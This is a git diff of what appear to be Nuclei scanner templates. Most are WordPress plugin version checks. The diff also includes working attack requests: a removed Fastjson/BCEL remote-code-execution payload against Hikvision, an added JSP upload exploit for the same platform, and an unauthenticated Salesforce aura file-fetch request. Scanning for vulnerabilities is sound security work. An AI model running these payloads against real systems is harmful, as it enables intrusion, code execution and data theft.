+ regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-seo-pack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.001') \ No newline at end of file diff --git a/poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml b/poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml new file mode 100644 index 0000000000..022343c4bb --- /dev/null +++ b/poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml @@ -0,0 +1,59 @@ +id: quiz-master-next-a245f156676109e1d14f3370b00c9905 + +info: + name: > + Quiz and Survey Master (QSM) <= 9.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a87f0a2-42b0-4536-b4d1-83a9f6ed4262?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/quiz-master-next/" + google-query: inurl:"/wp-content/plugins/quiz-master-next/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,quiz-master-next,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/quiz-master-next/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "quiz-master-next" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.1.0') \ No newline at end of file diff --git a/poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml b/poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml new file mode 100644 index 0000000000..27993021c8 --- /dev/null +++ b/poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml @@ -0,0 +1,59 @@ +id: ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2 + +info: + name: > + Review Ratings <= 1.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f890790-c5ca-4812-9566-6c945d8f39b5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ratings-shorttags/" + google-query: inurl:"/wp-content/plugins/ratings-shorttags/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ratings-shorttags,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ratings-shorttags/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ratings-shorttags" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6') \ No newline at end of file diff --git a/poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml b/poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml new file mode 100644 index 0000000000..344eabb0f0 --- /dev/null +++ b/poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml @@ -0,0 +1,59 @@ +id: registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45 + +info: + name: > + Registrations for the Events Calendar – Event Registration Plugin <= 2.12.2 - Authenticated (Contributor+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/26e35c4a-79ec-4742-8004-1c799d2c56ff?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/registrations-for-the-events-calendar/" + google-query: inurl:"/wp-content/plugins/registrations-for-the-events-calendar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,registrations-for-the-events-calendar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "registrations-for-the-events-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.2') \ No newline at end of file diff --git a/poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml b/poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml new file mode 100644 index 0000000000..5d70f1e3a0 --- /dev/null +++ b/poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml @@ -0,0 +1,59 @@ +id: the-post-grid-11c57e46d323949f1474677c8ea8f409 + +info: + name: > + The Post Grid <= 7.7.11 - Authenticated (Contributor+) Information Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dddecb2e-9ad6-4e44-afce-5eba7da6322d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/the-post-grid/" + google-query: inurl:"/wp-content/plugins/the-post-grid/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,the-post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.7.11') \ No newline at end of file diff --git a/poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml b/poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml new file mode 100644 index 0000000000..4e314facff --- /dev/null +++ b/poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml @@ -0,0 +1,59 @@ +id: vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15 + +info: + name: > + Vikinghammer Tweet <= 0.2.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0598341-0088-42bf-9a34-794c941a848d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/vikinghammer-tweet/" + google-query: inurl:"/wp-content/plugins/vikinghammer-tweet/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,vikinghammer-tweet,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vikinghammer-tweet/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vikinghammer-tweet" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml b/poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml new file mode 100644 index 0000000000..7785af80fe --- /dev/null +++ b/poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml @@ -0,0 +1,59 @@ +id: woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525 + +info: + name: > + WBW Product Table Pro <= 1.9.4 - Unauthenticated Arbitrary SQL Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac167257-c34e-45a2-8647-ed5cdb8dd64d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-producttables-pro/" + google-query: inurl:"/wp-content/plugins/woo-producttables-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-producttables-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-producttables-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-producttables-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.4') \ No newline at end of file diff --git a/poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml b/poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml new file mode 100644 index 0000000000..9a6bd53c06 --- /dev/null +++ b/poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml @@ -0,0 +1,59 @@ +id: zephyr-project-manager-ae04686326d43f919e9c393e1e364c95 + +info: + name: > + Zephyr Project Manager <= 3.3.102 - Missing Authorization to Authenticated (Subscriber+) Status Updates + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6746d20c-d528-4c69-95e4-9f22d6460463?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.102') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml @@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: word words: - - "nt authority\\system" + - '{{randstr}}' diff --git a/poc/remote_code_execution/salesforce-contentdocument-detector.yaml b/poc/remote_code_execution/salesforce-contentdocument-detector.yaml new file mode 100644 index 0000000000..19c7c66a85 --- /dev/null +++ b/poc/remote_code_execution/salesforce-contentdocument-detector.yaml @@ -0,0 +1,37 @@ +id: salesforce-contentdocument-detector + +info: + name: Salesforce ContentDocument Detector + author: TedJackson + severity: Medium + description: A Salesforce Lightning aura API allows unathenticated users to fetch files. + tags: aura,unauth,salesforce,exposure,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/s/" + + extractors: + - type: regex + group: 1 + name: auracontext + part: body + internal: true + regex: + - "\\/s\\/sfsites\\/l\\/([a-zA-Z0-9\\-_~.%]+)\\/[^\\/]+\\.js" + + - raw: + - | + POST /s/sfsites/aura HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36 + Content-Type: application/x-www-form-urlencoded + + message={"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"ContentDocument","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}&aura.context={{auracontext}}&aura.pageURI=%2Fs%2F&aura.token=null + + matchers: + - type: word + words: + - '"state":"SUCCESS",' + part: body diff --git a/poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml b/poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml new file mode 100644 index 0000000000..5c4318cc5c --- /dev/null +++ b/poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml @@ -0,0 +1,59 @@ +id: ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5 + +info: + name: > + TI WooCommerce Wishlist <= 2.8.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8456fa-939c-4ceb-8361-a8758aec7708?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ti-woocommerce-wishlist/" + google-query: inurl:"/wp-content/plugins/ti-woocommerce-wishlist/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ti-woocommerce-wishlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ti-woocommerce-wishlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ti-woocommerce-wishlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.2') \ No newline at end of file diff --git a/poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml b/poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml new file mode 100644 index 0000000000..d603cfda59 --- /dev/null +++ b/poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml @@ -0,0 +1,59 @@ +id: extended-search-plugin-7e067968dc74df931237c1c4dd7e5960 + +info: + name: > + Enhanced Search Box <= 0.6.1 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/13fb8d16-2904-4c04-9ea6-5bafdf30f563?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/extended-search-plugin/" + google-query: inurl:"/wp-content/plugins/extended-search-plugin/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,extended-search-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/extended-search-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "extended-search-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.1') \ No newline at end of file diff --git a/poc/search/relevanssi-live-ajax-search.yaml b/poc/search/relevanssi-live-ajax-search.yaml new file mode 100644 index 0000000000..2bf0c2e77c --- /dev/null +++ b/poc/search/relevanssi-live-ajax-search.yaml @@ -0,0 +1,59 @@ +id: relevanssi-live-ajax-search + +info: + name: > + Relevanssi Live Ajax Search <= 2.4 - Unauthenticated WP_Query Argument Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/relevanssi-live-ajax-search/" + google-query: inurl:"/wp-content/plugins/relevanssi-live-ajax-search/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,relevanssi-live-ajax-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/relevanssi-live-ajax-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "relevanssi-live-ajax-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4') \ No newline at end of file diff --git a/poc/sql/BlindSQLAuth.yaml b/poc/sql/BlindSQLAuth.yaml index ce5d86554b..6fd8c3c79a 100644 --- a/poc/sql/BlindSQLAuth.yaml +++ b/poc/sql/BlindSQLAuth.yaml @@ -1,33 